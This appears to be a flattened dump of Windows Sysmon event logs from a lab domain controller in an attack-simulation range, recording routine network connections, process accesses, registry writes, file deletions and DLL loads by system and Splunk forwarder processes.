354300x8000000000000000100949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:22.082{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53370-false10.0.1.12-8000- 23542300x8000000000000000100954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.859{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DD1DFEACF057213BAFEF2865896E6AD,SHA256=5D5D6CFA3773A369A204C90716194E5D00712E14111D61577C1F06AE0A2EFDAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x8000000000000000100953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A254-6294-1500-000000005502}1232C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A254-6294-1500-000000005502}1232C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A254-6294-1500-000000005502}1232C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000100955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:28.952{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=599044A3E9BA6A0AE97B952FED09BDF0,SHA256=D8FA499F2F177FDD8EE1BAEA3167E05BE1411A5778BBA961DF5A6C7B288480BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x8000000000000000100958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:29.640{326FD73D-A253-6294-0B00-000000005502}6323688C:\Windows\system32\lsass.exe{326FD73D-A251-6294-0100-000000005502}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97302|C:\Windows\system32\kerberos.DLL+79744|C:\Windows\system32\kerberos.DLL+1444f|C:\Windows\system32\lsasrv.dll+2f1c1|C:\Windows\system32\lsasrv.dll+2d0a6|C:\Windows\system32\lsasrv.dll+328e9|C:\Windows\system32\lsasrv.dll+30237|C:\Windows\system32\lsasrv.dll+2f1c1|C:\Windows\system32\lsasrv.dll+174fd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000100957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:29.530{326FD73D-A253-6294-0B00-000000005502}6323688C:\Windows\system32\lsass.exe{326FD73D-A254-6294-1600-000000005502}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:29.530{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A254-6294-1600-000000005502}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000100960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:30.593{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A0285EDC424C87AD936C9B12367BAAB1,SHA256=F4171A58EA46C497FDDDCFBA0B4CA678CB93FBB2BF455868ED12E44379F276F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:30.062{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28F03853D73E14434EBB0EB2263BED8D,SHA256=78FBA581C8A8A9571652D15187E25808EBDD88126D432006843D3082AB2218FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.554{326FD73D-A251-6294-0100-000000005502}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53373-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local445microsoft-ds 354300x8000000000000000100966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.554{326FD73D-A251-6294-0100-000000005502}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53373-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local445microsoft-ds 354300x8000000000000000100965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.452{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53372-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x8000000000000000100964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.452{326FD73D-A254-6294-1600-000000005502}1300C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53372-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x8000000000000000100963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.445{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53371-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x8000000000000000100962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.445{326FD73D-A254-6294-1600-000000005502}1300C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53371-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local389ldap 23542300x8000000000000000100961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:31.155{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C58C45781354D74B6D5E1364708780A6,SHA256=A851D07FA857C4BF3F001964B030136A0C014DAE7C6AB887C0E48EF552FF6C6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:28.051{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53374-false10.0.1.12-8000- 23542300x8000000000000000100968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:32.249{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBE5E9E3D4CAF9839A8E8504B333E2C6,SHA256=CA48837764000619F186100A5315C9246A997C36D3BA9897AADB9DD71E15C673,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:33.343{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F22ABCBB66F1D1C2FA6CE612B18329A4,SHA256=F9ABBC4739FF8EC2A38335861D08979044F5A05521243CA1A6C4380B3DD46260,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:34.437{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C806C8F6A905541D1D71B6B7DE919FE2,SHA256=8832ABBA0A6DB4A835051DEF2002ED9265FC61BA8A2A60A207B1196732D9B2F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:35.530{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06EB9AF971079F3CF40832F0EA1EA187,SHA256=E50A8AC713E7A6736CED6906F6CE62983D792C489A0BE29F0AD672564A58D936,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:36.624{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEF3A7A4E6E87E68E155D1F1BBF38704,SHA256=0DFE5C030FFB9F34F709B8261BF7F24C44785DC947296CB3E80483F19B4C5F84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:37.718{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=280647663222F5C6237E50183CC5F34D,SHA256=6622968565AD02EACB8620AB34765B7AC9D527D58D0BD83AFE928C7D137B4C29,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:34.051{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53375-false10.0.1.12-8000- 23542300x8000000000000000100976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:38.827{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=706EBBADAB77EB6BEC394B69043AD4E5,SHA256=A1E01ACEEFF8CF0482203CA1ABBF59DB26A7A5F3CA732CF2F5CF6CEAC8BDC7EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:39.921{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93D63A8C70448CCF0417D3C07E9A5B49,SHA256=D093D083B051F50657E8566D2A18FB2837396C2A0E2E6C99A7C43AE9649104C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x8000000000000000100986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:07:39.593{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000100985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:07:39.593{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x007a3602) 13241300x8000000000000000100984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:07:39.593{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8741d-0xdb3722cc) 13241300x8000000000000000100983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:07:39.593{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d87426-0x3cfb8acc) 13241300x8000000000000000100982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:07:39.593{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d8742e-0x9ebff2cc) 13241300x8000000000000000100981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:07:39.593{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000100980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:07:39.593{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x007a3602) 13241300x8000000000000000100979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:07:39.593{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8741d-0xdb4db6ea) 13241300x8000000000000000100978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:07:39.593{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d87426-0x3d121eea) 13241300x8000000000000000100977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:07:39.593{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d8742e-0x9ed686ea) 23542300x8000000000000000100989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:41.640{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC4085B00DA31DD1F96F19BD0AEBE0C2,SHA256=B9F3AD590F9679C66A2E38584781A64A9108F2C277FF188E12892F7CA03EEBBF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:41.015{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97E01D5BB9586C353400AE46E4F0EF47,SHA256=5F3B605F01FED8B7E6EBF75297E2299F49D2140304D4D930536CCE90BBF2C9E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:39.129{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53376-false10.0.1.12-8000- 23542300x8000000000000000100990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:42.108{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9575D4E92487ABA97AE1FC7C76230E45,SHA256=E62C3F7CE0EFD077C14D08F63DF9AB1A3AF1594B83FA38507CD4F0EA5314CB62,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:40.426{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53377-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x8000000000000000100993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:40.426{326FD73D-A262-6294-2300-000000005502}2720C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53377-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 23542300x8000000000000000100992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:43.202{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DE811D886CFC53BB89C73B10D8F9B63,SHA256=CA550C74C2491BCC186314876FC2ED5E4D159415DD606FBD21DEB20288EB1D90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:44.296{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5901856C7FDA35FBD71AAAB27EB95D75,SHA256=06573DA02A9F71A03E8D5AA1AD0855B9A92E419E75D5C5297ACAC8AFE5ABC5A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000101044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000101043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000101042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 